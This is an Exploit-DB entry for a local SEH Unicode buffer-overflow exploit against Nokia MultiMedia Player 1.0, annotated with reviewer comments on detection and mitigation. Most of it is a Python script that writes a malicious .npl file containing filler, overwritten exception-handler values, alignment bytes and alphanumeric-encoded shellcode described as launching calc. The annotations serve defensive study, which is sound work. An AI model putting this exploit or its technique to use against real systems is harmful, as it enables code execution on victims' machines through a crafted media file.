Nokia MultiMedia Player 1.0 – Local Overflow (SEH Unicode)

  • 作者: Carlos Mario Penagos Hollmann
    日期: 2011-01-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15975/
  • # Exploit Title: Nokia Multimedia player SEH Unicode
    # Date: January 11 2011
    # Author: Carlos Mario Penagos Hollmann
    # Software Link: http://www.brothersoft.com/nokia-multimedia-player-download-46238.html
    # Version: 1.00.55.5010
    # Tested on: Windows xp sp3 running on VMware Fusion 3.1 and VirtualBox 3.2.8
    
     
    #mail----> shogilord^gmail.com spams are welcome!!!!! 
    #__________________ ____ __ _____ ________
    # / ____/ / | |/ / ____/ | / / //_//_/ | / / ____/
    #/ __/ / /| | / / __/ /|/ / ,< / //|/ / / __ 
    # / /___/ /___| |/ / /___/ /|/ /| |_/ // /|/ /_/ / 
    #/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/
     
    # COLOMBIA hacking presents.............
    # 
    # Dont be afraid of unicode my young padawan 
    # 
    # Big Thanks to sud0 !!
    #
    
    # Reviewer notes (defensive reading of this proof of concept).
    # The statements below assemble one long string and write it to
    # "Crash1234.npl", an input file for the player version named in the
    # header. Nothing here touches the network; the only side effect is the
    # file created in the current working directory.
    #
    # Detection: the generated file is a single run of more than 3,500
    # characters with no line breaks, beginning with 2,660 repeated "D" (0x44)
    # bytes. That is presumably far outside what a legitimate .npl file holds
    # (TODO confirm against the real file format).
    # Mitigation: the page names no fixed version, so treat .npl files from
    # untrusted sources as hostile on hosts that still have this player, and
    # rely on platform hardening (DEP, SEHOP, ASLR, SafeSEH-built modules);
    # the page's test target is Windows XP SP3.

    # Filler: 2,660 copies of 0x44 ("D"). Judging by the concatenation order
    # below, this is the distance from the start of the input to the
    # overwritten exception-handler record (assumption; the author does not
    # state how the number was obtained).
    junk="\x44" * 2660
    
    # Payload in an alphanumeric-only encoding. The author's trailing comment
    # says it launches calc; it was not decoded or verified in this review.
    shellcode = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBdK8lPU4KjLS8o0mPO0LoQXc3QQPlpcdMa5YhnpVXgWRs920wkOXPA" #calc shellcode
    
    # Two-byte value that lands in the "next SEH" field of the overwritten
    # record (inferred from the name and its position in buff).
    nseh="\x61\xC5" 
    
    # Seven-byte sequence placed directly after the handler fields. The author
    # gives no explanation; the name suggests it adjusts state before the
    # payload runs (assumption, unverified).
    align = "\x61\x6D\x61\x6D\x50\x6E\xC3" 
    
    
    # Two-byte value that lands in the handler-address field. Only two bytes
    # are supplied, which fits the "Unicode" in the title: presumably the
    # target widens its input to UTF-16 before the overflow (TODO confirm).
    seh="\xEF\x42"
    
    # 45 bytes of 0xCC (the x86 int3 breakpoint opcode) used as padding
    # between the align bytes and the payload.
    junk2="\xcc"*45
    
    # 850 bytes of 0xCC appended after the payload as trailing padding.
    junk3="\xcc"*850
    
    # Final layout: filler | nseh | seh | align | padding | payload | padding.
    buff=junk+nseh+seh+align+junk2+shellcode+junk3
    
    # Text-mode write with an explicit close and no error handling.
    # NOTE(review): presumably written for Python 2, where str is a byte
    # string. Under Python 3 text mode the non-ASCII values would be encoded
    # rather than written raw, so hashes or byte signatures taken from a
    # generated sample can differ between interpreters.
    magic = open("Crash1234.npl","w")
    
    magic.write(buff)
    
    magic.close()